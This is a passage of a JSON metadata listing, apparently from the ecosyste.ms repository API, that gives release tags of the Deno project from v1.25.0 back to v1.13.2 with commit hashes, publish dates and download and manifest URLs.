ub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit"